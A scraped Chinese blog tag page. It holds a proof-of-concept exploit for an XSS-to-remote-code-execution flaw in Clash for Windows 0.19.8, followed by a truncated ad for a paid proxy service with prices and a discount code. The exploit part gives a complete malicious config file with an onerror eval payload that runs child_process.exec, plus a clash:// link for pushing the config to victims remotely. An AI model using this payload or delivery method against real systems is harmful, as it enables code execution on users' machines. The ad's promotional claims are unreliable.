https://www.msl.la/tag/clash/ https://www.msl.la/archives/494/ 2022-03-02T11:05:00+08:00 描述crash_for_windows_pkg 由 Electron 提供支持。 如果 XSS 负载以代理的名义，我们可以远程执行受害者计算机上的任何 JavaScript 代码。受影响的 clash_for_windows_pkg 版本version: 0.19.8 (0.19.9版本还有其他漏洞触发，正好是0.19.9)系统: Windows系统版本: Windows 10PoC导入以下Clash配置文件：port: 7890 socks-port: 7891 allow-lan: true mode: Rule log-level: info external-controller: :9090 proxies: - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" skip-cert-verify: true proxy-groups: - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: select proxies: - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>切换到这个"Profiles"点击 "Proxies" 列（有时不需要。）注意:您需要确保有效负载显示在代理列中。漏洞利用在理论上是稳定的，但有时可能需要重新启动 crash_for_windows_pkg 并重现漏洞利用方式将恶意配置文件放到互联网上并使用clash://安装它，clash_for_windows_pkg 将自动下载并切换到它。例如：clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCECFW最新版本：https://github.com/Fndroid/clash_for_windows_pkg/releasesCFW漏洞issues：https://github.com/Fndroid/clash_for_windows_pkg/issues/2710#issue-1148197704 https://www.msl.la/archives/377/ 2021-06-23T13:21:00+08:00 火星云好不好？火星云稳不稳？火星云优惠码是多少？火星云怎么样？火星云快不快？火星云是一家中高端 SSR、V2Ray 高性价比机场。[scode type="lblue"]官网传送门：点此前往[/scode]简介后台节点更新快，有IPLC/IEPL/CN2等节点，线路全中转节点类型丰富，除了SSR的还有V2ray和Trojan速度快，youtube 4k视频无卡顿，能超前缓冲。采用军事级加密，不记录用户使用日志，隐私性高海外公司，安全提供NETFLIX、HBO账号解锁台区哔哩哔哩全球流媒体提供免费小火箭账号、全平台客户端支持可以免费试用体验多达20国家原生ip节点、全节点解锁奈飞（无限制地区片源）、让你畅通无阻如德芙纵享丝滑般刷剧、畅快使用Twitter、Tik Tok、facbook、netflix、油管、谷歌套餐套餐每月流量(GB)月付(元)季付(元)半年(元)年付(元)备注火星1号10015459090无IPLC专线火星2号30035105210252有IPLC专线精简年费40×××66每年限量100份TikTok流量包666××88×半年限量100份最强王者流量包2048×××299 本站专属优惠[scode type="green"]本站专属优惠码：AUOKHXRTNT （8折）[/scode]V2ray测速：